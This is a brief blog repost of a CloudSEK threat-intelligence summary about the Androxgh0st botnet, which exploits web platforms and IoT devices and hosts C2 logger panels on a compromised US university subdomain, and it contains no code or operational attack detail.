Post

Androxgh0st Continues Exploitation Operators Compromise a US University For Hosting C2 Logger

Posted
By ictsec.pl
1 min read
Androxgh0st Continues Exploitation Operators Compromise a US University For Hosting C2 Logger

Executive Summary

CloudSEK’s recent investigation reveals that the Androxgh0st botnet has evolved significantly since its early activity in 2023, leveraging a wide range of Initial Access Vectors (IAVs). Misconfigured/vulnerable servers linked to academic institutions and public domains, such as University of California, San Diego’s “USArhythms” subdomain, were found hosting command-and-control (C2) logger panels. The botnet exploits popular platforms (e.g., Apache Shiro, Spring framework, WordPress) and IoT devices (Lantronix), enabling remote code execution, sensitive data theft, and cryptomining. Evidence from the C2 logs highlight exploitation attempts using a plethora of command injection techniques. Webshells planted on compromised infrastructure facilitate persistent access and further payload deployment.

To read the complete article see: Androxgh0st Continues Exploitation: Operators Compromise a US University For Hosting C2 Logger

CYBERSECURITY
MALWARE ANDROXGH0ST C2 LOGGER BOTNET SECURITY
This post is licensed under CC BY 4.0 by the author.